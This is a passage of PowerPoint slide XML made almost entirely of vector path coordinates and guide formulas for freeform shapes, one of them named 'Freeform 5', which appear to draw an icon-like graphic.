                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1900" y="5103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931" y="5124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931" y="5124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="5218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="5313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1937" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968" y="5229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984" y="5140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1995" y="5140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1995" y="5140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="5134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2068" y="5119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2068" y="5119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141" y="5161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2215" y="5197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="5261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="5261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2383" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2430" y="5350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2509" y="5350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2530" y="5339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="5329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="5329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2887" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997" y="5434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997" y="5434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2960" y="5486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2913" y="5539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2866" y="5591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2813" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2813" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2798" y="5633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750" y="5633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2729" y="5649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="5670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2714" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2714" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2714" y="5707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="5722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="5722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646" y="5775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656" y="5785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2729" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2729" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750" y="5754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2803" y="5754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2824" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2834" y="5717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="5675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2829" y="5659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2829" y="5659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2893" y="5607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2945" y="5554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997" y="5497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160" y="5450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3491" y="5455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3591" y="5450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3680" y="5434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3842" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3842" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="5402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3879" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3858" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3805" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3753" y="5554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3695" y="5597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3580" y="5675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3517" y="5707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3449" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386" y="5765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="5791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3249" y="5812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3176" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3102" y="5843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3029" y="5854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2803" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2724" y="5854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646" y="5843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="5806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2320" y="5744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2241" y="5707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162" y="5665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089" y="5618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2021" y="5565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1900" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721" y="5245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1680" y="5187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1648" y="5124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1617" y="5061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1585" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1559" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1537" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1517" y="4793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1507" y="4720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1490" y="4646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1485" y="4573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1485" y="4332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1501" y="4211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1527" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564" y="3969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564" y="3969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1596" y="3895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="3827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1669" y="3759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1753" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805" y="3565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="3507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911" y="3449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968" y="3397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="3350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2094" y="3302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2157" y="3260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2231" y="3218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299" y="3187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372" y="3155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2756" y="3066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="3061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="3061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971" y="3061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3060" y="3071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144" y="3087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3396" y="3160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3475" y="3192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3632" y="3281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3706" y="3334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="3391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3848" y="3449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="3517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3974" y="3586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4026" y="3659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4079" y="3738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4126" y="3817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4163" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4199" y="3990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4226" y="4079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4247" y="4168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4268" y="4263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4273" y="4362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4273" y="4562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4263" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4247" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4278" y="4468"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4252" y="4426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173" y="4342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4205" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4468"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1564" y="3969"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1564" y="3969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1574" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1590" y="4016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1611" y="4032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1596" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1580" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564" y="396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02" name="Freeform 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6546612" y="3950847"/>
              <a:ext cx="2629523" cy="2201971"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 4688 w 7403"/>
                <a:gd name="T1" fmla="*/ 2237 h 6201"/>
                <a:gd name="T2" fmla="*/ 4709 w 7403"/>
                <a:gd name="T3" fmla="*/ 2200 h 6201"/>
                <a:gd name="T4" fmla="*/ 4673 w 7403"/>
                <a:gd name="T5" fmla="*/ 2163 h 6201"/>
                <a:gd name="T6" fmla="*/ 4289 w 7403"/>
                <a:gd name="T7" fmla="*/ 2174 h 6201"/>
                <a:gd name="T8" fmla="*/ 4284 w 7403"/>
                <a:gd name="T9" fmla="*/ 2216 h 6201"/>
                <a:gd name="T10" fmla="*/ 4494 w 7403"/>
                <a:gd name="T11" fmla="*/ 4274 h 6201"/>
                <a:gd name="T12" fmla="*/ 4394 w 7403"/>
                <a:gd name="T13" fmla="*/ 4305 h 6201"/>
                <a:gd name="T14" fmla="*/ 4332 w 7403"/>
                <a:gd name="T15" fmla="*/ 4384 h 6201"/>
                <a:gd name="T16" fmla="*/ 4321 w 7403"/>
                <a:gd name="T17" fmla="*/ 4489 h 6201"/>
                <a:gd name="T18" fmla="*/ 4368 w 7403"/>
                <a:gd name="T19" fmla="*/ 4578 h 6201"/>
                <a:gd name="T20" fmla="*/ 4494 w 7403"/>
                <a:gd name="T21" fmla="*/ 4631 h 6201"/>
                <a:gd name="T22" fmla="*/ 4594 w 7403"/>
                <a:gd name="T23" fmla="*/ 4599 h 6201"/>
                <a:gd name="T24" fmla="*/ 4662 w 7403"/>
                <a:gd name="T25" fmla="*/ 4520 h 6201"/>
                <a:gd name="T26" fmla="*/ 4673 w 7403"/>
                <a:gd name="T27" fmla="*/ 4416 h 6201"/>
                <a:gd name="T28" fmla="*/ 4620 w 7403"/>
                <a:gd name="T29" fmla="*/ 4326 h 6201"/>
                <a:gd name="T30" fmla="*/ 4494 w 7403"/>
                <a:gd name="T31" fmla="*/ 4274 h 6201"/>
                <a:gd name="T32" fmla="*/ 3895 w 7403"/>
                <a:gd name="T33" fmla="*/ 2457 h 6201"/>
                <a:gd name="T34" fmla="*/ 3854 w 7403"/>
                <a:gd name="T35" fmla="*/ 2525 h 6201"/>
                <a:gd name="T36" fmla="*/ 3874 w 7403"/>
                <a:gd name="T37" fmla="*/ 4142 h 6201"/>
                <a:gd name="T38" fmla="*/ 5066 w 7403"/>
                <a:gd name="T39" fmla="*/ 4163 h 6201"/>
                <a:gd name="T40" fmla="*/ 5119 w 7403"/>
                <a:gd name="T41" fmla="*/ 4142 h 6201"/>
                <a:gd name="T42" fmla="*/ 5140 w 7403"/>
                <a:gd name="T43" fmla="*/ 2525 h 6201"/>
                <a:gd name="T44" fmla="*/ 5093 w 7403"/>
                <a:gd name="T45" fmla="*/ 2457 h 6201"/>
                <a:gd name="T46" fmla="*/ 0 w 7403"/>
                <a:gd name="T47" fmla="*/ 6200 h 6201"/>
                <a:gd name="T48" fmla="*/ 5240 w 7403"/>
                <a:gd name="T49" fmla="*/ 5985 h 6201"/>
                <a:gd name="T50" fmla="*/ 5350 w 7403"/>
                <a:gd name="T51" fmla="*/ 5571 h 6201"/>
                <a:gd name="T52" fmla="*/ 5528 w 7403"/>
                <a:gd name="T53" fmla="*/ 5192 h 6201"/>
                <a:gd name="T54" fmla="*/ 5765 w 7403"/>
                <a:gd name="T55" fmla="*/ 4857 h 6201"/>
                <a:gd name="T56" fmla="*/ 6059 w 7403"/>
                <a:gd name="T57" fmla="*/ 4563 h 6201"/>
                <a:gd name="T58" fmla="*/ 6394 w 7403"/>
                <a:gd name="T59" fmla="*/ 4326 h 6201"/>
                <a:gd name="T60" fmla="*/ 6773 w 7403"/>
                <a:gd name="T61" fmla="*/ 4148 h 6201"/>
                <a:gd name="T62" fmla="*/ 7187 w 7403"/>
                <a:gd name="T63" fmla="*/ 4038 h 6201"/>
                <a:gd name="T64" fmla="*/ 7402 w 7403"/>
                <a:gd name="T65" fmla="*/ 0 h 6201"/>
                <a:gd name="T66" fmla="*/ 6316 w 7403"/>
                <a:gd name="T67" fmla="*/ 127 h 6201"/>
                <a:gd name="T68" fmla="*/ 5292 w 7403"/>
                <a:gd name="T69" fmla="*/ 425 h 6201"/>
                <a:gd name="T70" fmla="*/ 4352 w 7403"/>
                <a:gd name="T71" fmla="*/ 882 h 6201"/>
                <a:gd name="T72" fmla="*/ 3502 w 7403"/>
                <a:gd name="T73" fmla="*/ 1486 h 6201"/>
                <a:gd name="T74" fmla="*/ 2762 w 7403"/>
                <a:gd name="T75" fmla="*/ 2211 h 6201"/>
                <a:gd name="T76" fmla="*/ 2147 w 7403"/>
                <a:gd name="T77" fmla="*/ 3050 h 6201"/>
                <a:gd name="T78" fmla="*/ 1670 w 7403"/>
                <a:gd name="T79" fmla="*/ 3985 h 6201"/>
                <a:gd name="T80" fmla="*/ 1355 w 7403"/>
                <a:gd name="T81" fmla="*/ 4998 h 6201"/>
                <a:gd name="T82" fmla="*/ 200 w 7403"/>
                <a:gd name="T83" fmla="*/ 6001 h 6201"/>
                <a:gd name="T84" fmla="*/ 5334 w 7403"/>
                <a:gd name="T85" fmla="*/ 4563 h 6201"/>
                <a:gd name="T86" fmla="*/ 5224 w 7403"/>
                <a:gd name="T87" fmla="*/ 4689 h 6201"/>
                <a:gd name="T88" fmla="*/ 3927 w 7403"/>
                <a:gd name="T89" fmla="*/ 4736 h 6201"/>
                <a:gd name="T90" fmla="*/ 3770 w 7403"/>
                <a:gd name="T91" fmla="*/ 4689 h 6201"/>
                <a:gd name="T92" fmla="*/ 3659 w 7403"/>
                <a:gd name="T93" fmla="*/ 4563 h 6201"/>
                <a:gd name="T94" fmla="*/ 3638 w 7403"/>
                <a:gd name="T95" fmla="*/ 2163 h 6201"/>
                <a:gd name="T96" fmla="*/ 3722 w 7403"/>
                <a:gd name="T97" fmla="*/ 1964 h 6201"/>
                <a:gd name="T98" fmla="*/ 3869 w 7403"/>
                <a:gd name="T99" fmla="*/ 1885 h 6201"/>
                <a:gd name="T100" fmla="*/ 5124 w 7403"/>
                <a:gd name="T101" fmla="*/ 1885 h 6201"/>
                <a:gd name="T102" fmla="*/ 5271 w 7403"/>
                <a:gd name="T103" fmla="*/ 1964 h 6201"/>
                <a:gd name="T104" fmla="*/ 5355 w 7403"/>
                <a:gd name="T105" fmla="*/ 2163 h 6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403" h="6201">
                  <a:moveTo>
                    <a:pt x="4315" y="2237"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4673" y="2237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="2237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4688" y="2237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4704" y="2226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4709" y="2216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4709" y="2200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4709" y="2200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4709" y="2184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4704" y="2174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4688" y="2168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4300" y="2168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4289" y="2174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4284" y="2184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4279" y="2200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4279" y="2200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4284" y="2216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4289" y="2226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4300" y="2237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="2237"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4494" y="4274"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4494" y="4274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4457" y="4279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4426" y="4284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4394" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4368" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4368" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4347" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4332" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4321" y="4416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4321" y="4489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4332" y="4520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4347" y="4552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4368" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4368" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4394" y="4599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4426" y="4615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4457" y="4626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4494" y="4631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4494" y="4631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4531" y="4626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4562" y="4615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4594" y="4599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4620" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4620" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4646" y="4552"/>
                  </a:lnTo>
                  <a:lnTo>
